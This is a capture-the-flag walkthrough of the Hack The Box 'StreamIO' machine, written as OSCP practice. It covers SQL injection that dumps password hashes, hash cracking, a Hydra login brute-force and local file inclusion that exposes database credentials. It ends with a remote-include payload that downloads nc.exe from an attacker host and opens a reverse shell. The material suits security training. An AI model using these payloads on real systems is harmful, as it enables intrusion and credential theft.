StreamIO
Completed on Sept 22, 2022
Last updated
Was this helpful?
Completed on Sept 22, 2022
Last updated
Was this helpful?
When I decided to work on this machine, I was looking for more options to practice for the OSCP. This machine was to me like hitting the jackpot as you can practice webapp attacks, lateral movement, Active Directory, and most importantly to do a thorough enumeration. With this you can take the fact that it shows you how you can move inwards from a web application to become a Domain Admin in Active Directory.
Just like we normally do, we need to enumerate the available services to then continue our enumeration process.
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ sudo nmap -Pn -sS -p- --min-rate=1000 --min-parallelism=100 -T5 10.129.167.113 -oA StreamIO
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-12 23:21 EDT
Nmap scan report for 10.129.167.113
Host is up (0.16s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49708/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 131.36 seconds
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ PORTS=$(cat StreamIO.nmap | grep open | awk -F "\/.*" '{print $1}' | sort -u | xargs | tr ' ' ',')
awk: warning: escape sequence `\/' treated as plain `/'
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 --min-parallelism=100 -T5 10.129.167.113 -oA StreamIO-PortScan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-12 23:23 EDT
Nmap scan report for 10.129.167.113
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-13 10:24:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after: 2022-03-24T07:03:28
|_ssl-date: 2022-09-13T10:25:34+00:00; +7h00m00s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-09-13T10:24:55
|_ start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.85 seconds
[1] 206000 segmentation fault sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 --min-parallelism=100 -T5
From the service enumeration, we get the following hosts which will be added to our hosts file:
streamIO.htb
watch.streamIO.htb
Moving forward with the service enumeration, we would like to see what's available to us through LDAP, but chances are you need to authenticate first.
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ ldapsearch -x -H ldap://streamio.htb:389 -D '' -w '' -b 'DC=streamio,DC=htb'
# extended LDIF
#
# LDAPv3
# base <DC=streamio,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses:Not much without credentials, but we can still get some basic information without credentials:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ ldapsearch -x -H ldap://streamio.htb:389 -x -s base -b '' "(objectClass=*)" "*" +
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: * +
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=streamIO,DC=htb
ldapServiceName: streamIO.htb:dc$@STREAMIO.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=streamIO,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
ion,DC=streamIO,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=streamIO,DC=htb
namingContexts: DC=streamIO,DC=htb
namingContexts: CN=Configuration,DC=streamIO,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=streamIO,DC=htb
namingContexts: DC=DomainDnsZones,DC=streamIO,DC=htb
namingContexts: DC=ForestDnsZones,DC=streamIO,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 147565
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
=Sites,CN=Configuration,DC=streamIO,DC=htb
dnsHostName: DC.streamIO.htb
defaultNamingContext: DC=streamIO,DC=htb
currentTime: 20220913103319.0Z
configurationNamingContext: CN=Configuration,DC=streamIO,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
This part of the enumeration is self-explanatory. We basically need to know what the applications are about and then try to find our way in.
While enumerating we find an email address with a domain we also got to see in our nmap scan and then while enumerating LDAP:
We also have Barry and Samantha as potential users of the environment as they are employees of StreamIO:
While enumerating pages and directories, we found a login pages on /login.php:
Which also leads to a /register.php page which we used to create one but when testing, it did not work. So we need to enumerate the applications' pages and directories from both URLs to get to know more of them.
stream.io:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ gobuster dir -u 'https://streamio.htb/' -k -w /opt/seclists/Discovery/Web-Content/big.txt -r -b 404 -t 20 --timeout 60s --wildcard -x .php,.log,.html 2> /dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://streamio.htb/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /opt/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,log,html
[+] Follow Redirect: true
[+] Timeout: 1m0s
===============================================================
2022/09/13 16:11:55 Starting gobuster in directory enumeration mode
===============================================================
/Admin (Status: 403) [Size: 18]
/ADMIN (Status: 403) [Size: 18]
/About.php (Status: 200) [Size: 7825]
/Contact.php (Status: 200) [Size: 6434]
/Images (Status: 403) [Size: 1233]
/Index.php (Status: 200) [Size: 13497]
/Login.php (Status: 200) [Size: 4145]
/about.php (Status: 200) [Size: 7825]
/admin (Status: 403) [Size: 18]
/contact.php (Status: 200) [Size: 6434]
/css (Status: 403) [Size: 1233]
/favicon.ico (Status: 200) [Size: 1150]
/fonts (Status: 403) [Size: 1233]
/images (Status: 403) [Size: 1233]
/index.php (Status: 200) [Size: 13497]
/js (Status: 403) [Size: 1233]
/login.php (Status: 200) [Size: 4145]
/logout.php (Status: 200) [Size: 13497]
/register.php (Status: 200) [Size: 4500]
===============================================================
2022/09/13 16:24:37 Finished
===============================================================
watch.streamio.htb:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ gobuster dir -u 'https://watch.streamio.htb/' -k -w /opt/seclists/Discovery/Web-Content/big.txt -r -b 404 -t 20 --timeout 60s --wildcard -x .php,.log,.html 2> /dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://watch.streamio.htb/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /opt/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,log,html
[+] Follow Redirect: true
[+] Timeout: 1m0s
===============================================================
2022/09/13 16:12:16 Starting gobuster in directory enumeration mode
===============================================================
/Index.php (Status: 200) [Size: 2829]
/Search.php (Status: 200) [Size: 253887]
/blocked.php (Status: 200) [Size: 677]
/favicon.ico (Status: 200) [Size: 1150]
/index.php (Status: 200) [Size: 2829]
/search.php (Status: 200) [Size: 253887]
/static (Status: 403) [Size: 1233]
===============================================================
2022/09/13 16:24:50 Finished
===============================================================
These pages don't lead to much, and we do have an admin directory, so let's fuzz it and see what's inside if anything:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/big.txt -u "https://streamio.htb/admin/FUZZ.php" --hc 404 --hl 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/FUZZ.php
Total requests: 20476
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000011469: 200 1 L 6 W 58 Ch "master"
Total time: 317.6052
Processed Requests: 20476
Filtered Requests: 20475
Requests/sec.: 64.46996
When accessing this page:
We will get to see later this is sort of a clue of what we will have to do or use.
Performing a basic test using: summer' OR 1=1--
Union-based SQLi Test: summer' UNION SELECT 1--
Even though it did not throw an error and was not redirected, we retrieved no data. It is possible this is a true positive Union-based SQLi.
Attempting to get the number of columns in the table:
From the multiple tests we performed, we were able to determine the table has 6 columns and we can retrieve data through the second one which is possibly a VARCHAR type column.
Query: summer' UNION SELECT 1,(SELECT @@version),1,1,1,1--
Retrieving the system user the database is running as:
Query: summer' UNION SELECT 1,(SELECT system_user),1,1,1,1--
Retrieving list of databases:
Query: summer' UNION SELECT 1,(SELECT db_name(N)),1,1,1,1--
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ for num in {1..10}; do \
curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT db_name(${num})),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>'; \
done | sed 's/<.*>\(.*\)<\/.*>/\1/'
master
tempdb
model
msdb
STREAMIO
streamio_backup
Retrieving list of tables in STREAMIO database: using STRING_AGG to retrieve the list as a one liner:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT STRING_AGG(name,',') FROM STREAMIO..sysobjects WHERE xtype = 'U'),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>' | sed 's/<.*>\(.*\)<\/.*>/\1/'
movies,usersRetrieving list of columns in STREAMIO..users table: using STRING_AGG to retrieve the list as a one liner from the table in the current database (STREAMIO)
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT STRING_AGG(name,',') FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users')),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>' | sed 's/<.*>\(.*\)<\/.*>/\1/'
id,is_staff,password,username
Retrieving username,password,is_staff content from STREAMIO..users table: using STRING_AGG and CONCAT to retrieve the list as a one liner
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT STRING_AGG(CONCAT(username,':',password,'/',is_staff),',') FROM STREAMIO..users),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>' | sed 's/<.*>\(.*\)<\/.*>/\1/' | tr -d ' ' | sed 's/,/\n/g'
James:c660060492d9edcaa8332d89c99c9239/1
Theodore:925e5408ecb67aea449373d668b7359e/1
Samantha:083ffae904143c4796e464dac33c1f7d/1
Lauren:08344b85b329d7efd611b7a7743e8a09/1
William:d62be0dc82071bccc1322d64ec5b6c51/1
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5/1
Robert:f03b910e2bd0313a23fdd7575f34a694/1
Thane:3577c47eb1e12c8ba021611e1280753c/1
Carmon:35394484d89fcfdb3c5e447fe749d213/1
Barry:54c88b2dbd7b1a84012fabc1a4c73415/1
Oliver:fd78db29173a5cf701bd69027cb9bf6b/1
Michelle:b83439b16f844bd6ffe35c02fe21b3c0/1
Gloria:0cfaaaafb559f081df2befbe66686de0/1
Victoria:b22abb47a02b52d5dfa27fb0b534f693/1
Alexendra:1c2b3d8270321140e5153f6637d3ee53/1
Baxter:22ee218331afd081b0dcd8115284bae3/1
Clara:ef8f3d30a856cf166fb8215aca93e9ff/1
Barbra:3961548825e3e21df5646cafe11c6c76/1
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f/1
Austin:0049ac57646627b8d7aeaccf8b6a936f/1
Garfield:8097cedd612cc37c29db152b6e9edbd3/1
Juliette:6dcd87740abb64edfa36d170f0d5450d/1
Victor:bf55e15b119860a6e6b5a164377da719/1
Lucifer:7df45a9e3de3863807c026ba48e55fb3/1
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8/1
Diablo:ec33265e5fc8c2f1b0c137bb7b3632b5/1
Robin:dc332fb5576e9631c9dae83f194f8e70/1
Stan:384463526d288edcc95fc3701e523bc7/1
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332/1
admin:665a50ac9eaa781e4f7f04199db97a11/0
Here, we try to crack the MD5 hashes we found in the database using JohnTheRipper:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ john --format=Raw-MD5 --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt db_users1
Using default input encoding: UTF-8
Loaded 30 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Remaining 28 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
physics69i (Lenord)
paddpadd (admin)
66boysandgirls.. (yoshihide)
%$clara (Clara)
$monique$1991$ (Bruno)
$hadoW (Barry)
$3xybitch (Juliette)
##123a8j8w5123## (Lauren)
!?Love?!123 (Michelle)
!5psycho8! (Victoria)
10g 0:00:00:01 DONE (2022-09-21 00:47) 7.352g/s 10546Kp/s 10546Kc/s 279422KC/s filimani..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
Some passwords were missed so we had to use crackstation.
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ pr -m -t users passwd
Lauren ##123a8j8w5123##
Sabrina !!sabrina$
Thane highschoolmusical
Barry $hadoW
Michelle !?Love?!123
Victoria !5psycho8!
Clara %$clara
Lenord physics69i
Juliette $3xybitch
Bruno $monique$1991$
yoshihide 66boysandgirls..
admin paddpadd
Since we have a login page and database credentials, we need to know which one we can use, so we will test with Hydra:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ hydra -L users -P passwd streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-21 01:42:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 144 login tries (l:12/p:12), ~9 tries per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:F=Login failed
[443][http-post-form] host: streamio.htb login: yoshihide password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-21 01:42:30
Testing login with yoshihide redirects to /login.php and then you need to browse to /admin manually which will reuse the session cookie:
The /admin page:
From these links, we only see the following, but we can also attempt to fuzz it and see what else:
Using WFuzz:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/big.txt -u "https://streamio.htb/admin/?FUZZ=" --hc 301,403,404 --hw 131 -b 'PHPSESSID=qrdq5raiimuql0o5jglipafr20'
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/?FUZZ=
Total requests: 20476
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000005860: 200 49 L 137 W 1712 Ch "debug"
000012080: 200 10790 25878 W 320235 Ch "movie"
L
000017116: 200 398 L 916 W 12484 Ch "staff"
000018838: 200 62 L 160 W 2073 Ch "user"
Total time: 249.3074
Processed Requests: 20476
Filtered Requests: 20472
Requests/sec.: 82.13150
This did not find ‘message’ which we know exist, but we found ‘debug’:
Through this parameter, we can attempt to access files through Local File Inclusion if vulnerable:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u "https://streamio.htb/admin/?debug=FUZZ" --hc 301,403,404 --hw 137 -b 'PHPSESSID=qrdq5raiimuql0o5jglipafr20'
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/?debug=FUZZ
Total requests: 235
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000044: 200 56 L 148 W 1804 Ch "C:/Windows/win.ini"
000000043: 200 70 L 273 W 2577 Ch "C:/WINDOWS/System32/drivers/etc/hosts"
000000065: 200 718 L 2664 W 46280 Ch "C:/Windows/System32/inetsrv/config/schema/ASPNET_s
chema.xml"
000000221: 200 76 L 307 W 3070 Ch "c:/WINDOWS/system32/drivers/etc/protocol"
000000232: 200 53 L 168 W 1988 Ch "c:/WINDOWS/WindowsUpdate.log"
000000220: 200 65 L 190 W 2119 Ch "c:/WINDOWS/system32/drivers/etc/networks"
000000222: 200 336 L 1383 W 19347 Ch "c:/WINDOWS/system32/drivers/etc/services"
000000218: 200 70 L 273 W 2577 Ch "c:/WINDOWS/system32/drivers/etc/hosts"
000000219: 200 128 L 720 W 5395 Ch "c:/WINDOWS/system32/drivers/etc/lmhosts.sam"
Total time: 3.482762
Processed Requests: 235
Filtered Requests: 226
Requests/sec.: 67.47517
Using the first as an example shows this parameter can be used for Local File Inclusion
Let's attempt to find php or other files in the current directory of the application:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/dirsearch.txt -u "https://streamio.htb/admin/?debug=FUZZ" --hc 301,403,404 --hw 137 -b 'PHPSESSID=qrdq5raiimuql0o5jglipafr20'
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/?debug=FUZZ
Total requests: 12938
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000007006: 200 46 L 136 W 1693 Ch "index.php"
Total time: 163.6831
Processed Requests: 12938
Filtered Requests: 12937
Requests/sec.: 79.04295
It returns an error message most probably as the webserver is not able to interpret the file or is restricted. We can encode this and try to retrieve the content:
Using -> php://filter/convert.base64-decode/resource=
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX GET --url 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php' --cookie 'PHPSESSID=qrdq5raiimuql0o5jglipafr20' | grep -E 'this option is for developers only(.*)' | sed 's/\t\t\(.*\)<\/.*>/\1/' | sed 's/\tthis option is for developers only//g' | base64 -d
<?php
define('included',true);
session_start();
if(!isset($_SESSION['admin']))
{
header('HTTP/1.1 403 Forbidden');
die("<h1>FORBIDDEN</h1>");
}
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);
?>
<!DOCTYPE html>
<html>
<head>
...
</head>
<body>
...
</body>
</html>base64: invalid input
Even though we truncated the output, in line 11 you can see the database connection string with hardcoded credentials: db_admin:B1@hx31234567890
Retrieving the contents of /admin/master.php accessed previously:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX GET --url 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php' --cookie 'PHPSESSID=qrdq5raiimuql0o5jglipafr20' | grep -E 'this option is for developers only(.*)' | sed 's/\t\t\(.*\)<\/.*>/\1/' | sed 's/\tthis option is for developers only//g' | base64 -d
<h1>Movie managment</h1>
<?php
...
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST" action="?movie=">
<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
...
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" )
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>base64: invalid input
This basically tell us at the end that through the ‘includes’ POST parameter, we can potentially use it for RFI and execute commands against the system.
This user was found in the database but the same credentials don't allow access to the system, but we can use RFI to get a reverse shell.
shell.php:
$cmd = "curl http://10.10.14.72/nc.exe -o C:\\Windows\\Temp\\nc.exe";
system($cmd);
$cmd = "C:\\Windows\\Temp\\nc.exe 10.10.14.72 1337 -e cmd.exe";
system($cmd); Execution:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url 'https://streamio.htb/admin/?debug=master.php' --data 'include=http://10.10.14.72/shell.php' --cookie 'PHPSESSID=qrdq5raiimuql0o5jglipafr20'
Reverse Shell:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ nc -lvp 1337
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.129.204.168.
Ncat: Connection from 10.129.204.168:49213.
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\streamio.htb\admin>dir
dir
Volume in drive C has no label.
Volume Serial Number is A381-2B63
Directory of C:\inetpub\streamio.htb\admin
02/22/2022 03:49 AM <DIR> .
02/22/2022 03:49 AM <DIR> ..
02/22/2022 03:49 AM <DIR> css
02/22/2022 03:49 AM <DIR> fonts
02/22/2022 03:49 AM <DIR> images
06/03/2022 01:51 AM 2,401 index.php
02/22/2022 04:19 AM <DIR> js
06/03/2022 01:53 AM 3,055 master.php
02/23/2022 03:16 AM 878 movie_inc.php
02/23/2022 03:16 AM 936 staff_inc.php
02/23/2022 03:16 AM 879 user_inc.php
5 File(s) 8,149 bytes
6 Dir(s) 7,064,821,760 bytes free
C:\inetpub\streamio.htb\admin>whoami
whoami
streamio\yoshihide
Attempting to use the db_admin credentials found after we upgrade to Powershell:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ nc -lvp 1338
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1338
Ncat: Listening on 0.0.0.0:1338
Ncat: Connection from 10.129.56.7.
Ncat: Connection from 10.129.56.7:62458.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\streamio.htb\admin> sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT name from streamio_backup..sysobjects WHERE xtype = 'U';"
sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT name from streamio_backup..sysobjects WHERE xtype = 'U';"
name
--------------------------------------------------------------------------------------------------------------------------------
movies
users
(2 rows affected)
PS C:\inetpub\streamio.htb\admin> sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT username,password FROM streamio_backup..users;"
sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT username,password FROM streamio_backup..users;"
username password
-------------------------------------------------- --------------------------------------------------
nikk37 389d14cb8e4e9b94b137deb1caf0612a
yoshihide b779ba15cedfd22a023c4d8bcf5f2332
James c660060492d9edcaa8332d89c99c9239
Theodore 925e5408ecb67aea449373d668b7359e
Samantha 083ffae904143c4796e464dac33c1f7d
Lauren 08344b85b329d7efd611b7a7743e8a09
William d62be0dc82071bccc1322d64ec5b6c51
Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
(8 rows affected)With Crackstation we get the following:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ cat db_users-backup_pw
nikk37:get_dem_girls2@yahoo.com
yoshihide:66boysandgirls..
James
Theodore
Samantha
Lauren:##123a8j8w5123##
William
Sabrina:!!sabrina$
Let's continue by gathering user information:
PS C:\inetpub\streamio.htb\admin> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================== ==============================================
streamio\yoshihide S-1-5-21-1470860369-1569627196-4264678630-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
